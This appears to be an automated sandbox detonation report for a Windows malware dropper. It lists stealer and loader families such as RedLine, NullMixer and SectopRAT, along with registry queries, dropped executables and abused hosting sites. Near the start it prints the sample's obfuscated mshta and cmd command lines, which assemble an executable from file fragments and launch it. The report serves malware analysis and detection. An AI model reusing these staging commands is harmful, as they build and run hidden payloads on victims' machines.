"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" ) do taskkill -f -Im "%~nXQ"

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe (CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 " , 0 ,trUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe -Y .\ISA502G.S7

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe

Network


Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-11-22 07:31

Reported

2024-11-22 07:33

Platform

win10v2004-20241007-en

Max time kernel

88s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12b275ee70c7e913.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu120bfbc2443b3b5d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu123e05ebe43921.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1262fd911d3e6320.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu124078ed79bdbd5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu123e05ebe43921.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133767343323403090" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12b275ee70c7e913.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
